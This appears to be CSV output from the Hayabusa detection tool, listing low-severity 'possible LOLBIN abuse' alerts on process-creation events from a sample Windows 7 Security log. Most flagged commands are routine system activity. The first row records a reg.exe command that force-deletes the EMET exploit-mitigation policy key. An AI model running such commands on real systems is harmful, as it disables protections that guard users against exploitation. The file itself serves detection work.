2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
